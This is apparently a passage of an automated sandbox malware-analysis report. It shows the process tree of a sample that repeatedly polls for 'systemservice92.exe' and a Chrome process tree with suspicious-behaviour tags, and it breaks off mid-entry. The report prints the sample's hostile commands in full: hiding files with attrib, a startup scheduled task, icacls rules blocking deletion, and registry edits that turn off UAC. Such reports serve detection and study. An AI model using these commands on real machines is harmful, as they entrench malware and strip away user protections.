      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9428
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9568
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:2440
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9808
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9820
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:1816
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:4620
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:884
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:1484
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:2144
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:1724
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9664
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9544
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:1412
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9944
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9644
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9968
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:10032
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:1436
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8188
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9528
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9932
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:10004
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:2008
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:2300
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:10060
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:1416
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9788
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:4632
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:1708
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5928
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:2656
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5900
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7040
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:4824
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6688
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5628
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:3928
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5728
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6928
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5696
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5596
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7160
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7144
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:10092
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:2784
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9612
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5744
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:3636
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:3272
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9484
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:4836
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9512
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:3116
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7268
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9476
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:4492
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9480
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9488
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:1752
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:4708
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:10220
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9960
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9436
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:4648
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5060
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5220
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:1568
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:1444
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:860
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6040
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9516
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:4616
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9800
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5752
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:1428
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:10012
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:932
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:2936
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:10036
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:1076
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:3112
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:2020
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:560
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5260
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5356
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5320
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5704
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5712
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5384
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5112
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5448
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:3836
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:3136
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5528
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:4852
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:1772
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:3100
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:3328
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5768
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:572
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5816
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6948
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5612
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5792
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5936
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:3120
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:2524
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:1792
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:3376
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:4212
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:2052
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:4884
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:4780
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:1408
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5576
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5508
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5800
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:1788
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:2544
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5520
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:3412
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:1920
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:4100
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:4680
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:2004
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:3596
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6008
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5980
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5984
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6120
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6076
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6112
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6096
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6036
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6024
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6028
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6176
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:556
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6180
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6252
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6248
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6300
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6312
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6336
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6380
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6464
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6372
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:2764
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6452
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6544
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6704
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:6520
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6708
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6844
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9912
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7376
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:3796
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:4400
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6796
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7216
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6648
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:7400
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7212
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7388
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8428
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7472
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:7392
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9304
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9272
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7488
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7584
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7572
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:7560
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7608
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7692
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7720
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7652
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7616
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7772
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7636
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7792
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7856
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7240
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7228
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:4208
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:8792
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8780
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8816
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9088
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9092
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9244
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:1164
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager\systemservice92.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    PID:5028
  - - C:\Windows\system32\attrib.exe
      attrib +h "C:\$Sys-Manager\systemservice92.exe"
      4⤵
      Views/modifies file attributes
      PID:2916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager\systemservice.bat""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    PID:2016
  - - C:\Windows\system32\attrib.exe
      attrib +h "C:\$Sys-Manager\systemservice.bat"
      4⤵
      Views/modifies file attributes
      PID:4896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    PID:2716
  - - C:\Windows\system32\attrib.exe
      attrib +h "C:\$Sys-Manager"
      4⤵
      Views/modifies file attributes
      PID:4252
- - C:\Windows\SYSTEM32\schtasks.exe
    schtasks /create /tn servicebat /tr C:\$Sys-Manager\systemservice.bat /sc onstart /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\$Sys-Manager" /deny *S-1-1-0:(D)"
    3⤵
    PID:2988
  - - C:\Windows\system32\icacls.exe
      icacls "C:\$Sys-Manager" /deny *S-1-1-0:(D)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"
    3⤵
    PID:3764
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      Modifies registry key
      PID:4804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f"
    3⤵
    PID:1776
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f
      4⤵
      Modifies registry key
      PID:4404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\$Sys-Manager" /deny *S-1-5-32-544:(D)"
    3⤵
    PID:3064
  - - C:\Windows\system32\icacls.exe
      icacls "C:\$Sys-Manager" /deny *S-1-5-32-544:(D)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"
    3⤵
    PID:976
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      Modifies registry key
      PID:1872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\$Sys-Manager" /deny *S-1-5-32-545:(D)"
    3⤵
    PID:3740
  - - C:\Windows\system32\icacls.exe
      icacls "C:\$Sys-Manager" /deny *S-1-5-32-545:(D)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager\desktop.ini""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    PID:1660
  - - C:\Windows\system32\attrib.exe
      attrib +h "C:\$Sys-Manager\desktop.ini"
      4⤵
      Views/modifies file attributes
      PID:4932

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f15ccc40,0x7ff9f15ccc4c,0x7ff9f15ccc58
  2⤵
  PID:3720
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1952,i,8090846515165484005,3702496044270238310,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1948 /prefetch:2
  2⤵
  PID:2304
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1692,i,8090846515165484005,3702496044270238310,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2076 /prefetch:3
  2⤵
  PID:4928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,8090846515165484005,3702496044270238310,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2224 /prefetch:8
  2⤵
  PID:4256
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3100,i,8090846515165484005,3702496044270238310,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3260 /prefetch:1
  2⤵
  PID:1364
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3160,i,8090846515165484005,3702496044270238310,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3304 /prefetch:1
  2⤵
  PID:1568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4424,i,8090846515165484005,3702496044270238310,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4428 /prefetch:1
  2⤵
  PID:2544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4320,i,8090846515165484005,3702496044270238310,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4284 /prefetch:1
  2⤵
  PID:1336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3348,i,8090846515165484005,3702496044270238310,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3288 /prefetch:8
  2⤵
  PID:3140
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4816,i,8090846515165484005,3702496044270238310,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4848 /prefetch:8
  2⤵
  PID:2676
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4928,i,8090846515165484005,3702496044270238310,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3476 /prefetch:8
  2⤵
  PID:2928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4852,i,8090846515165484005,3702496044270238310,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4748 /prefetch:8
  2⤵
  PID:2536
- C:\Program Files\Google\Chrome\Application\chrome.exe
